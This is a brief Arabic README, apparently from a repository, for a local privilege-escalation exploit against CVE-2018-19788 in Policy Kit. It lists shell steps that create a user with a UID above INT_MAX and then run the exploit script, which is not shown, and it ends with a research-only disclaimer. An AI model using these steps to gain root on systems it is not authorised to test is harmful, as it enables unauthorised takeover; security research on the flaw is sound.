
استغلال سهل وسخيف لـ CVE-2018-19788
استغلال سهل وسخيف لـ CVE-2018-19788
لاستخدام هذا، يجب عليك إما إنشاء مستخدم بمعرّف UID أكبر من INT_MAX في Policy Kit أو أن يكون لديك بالفعل مستخدم بصلاحيات منخفضة بمعرّف UID المذكور.
يمكن تحديد UID عند إنشاء المستخدم كما يلي، واستخدامه قبل تنفيذ السكريبت:
$ useradd -u 4000000001 PrivEsc
$ passwd PrivEsc
$ su PrivEsc
$ chmod +x /tmp/CVE-2018-19788_PrivEsc.sh
$ ./tmp/CVE-2018-19788_PrivEsc.sh
يرجى ملاحظة أن هذا مخصص للبحث فقط، وأنت المسؤول عن استخدامك الخاص لأي كود موجود في هذا المستودع أو أي مستودع آخر، كما يمليه المنطق السليم.